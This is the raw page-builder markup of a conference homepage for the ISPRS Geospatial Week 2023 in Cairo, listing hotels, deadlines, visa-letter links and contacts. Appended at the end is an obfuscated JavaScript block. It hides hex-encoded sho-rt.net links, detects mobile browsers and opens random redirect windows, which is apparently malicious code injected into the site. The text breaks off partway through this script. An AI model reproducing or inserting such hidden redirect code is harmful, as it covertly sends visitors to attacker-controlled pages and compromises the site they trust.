style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function 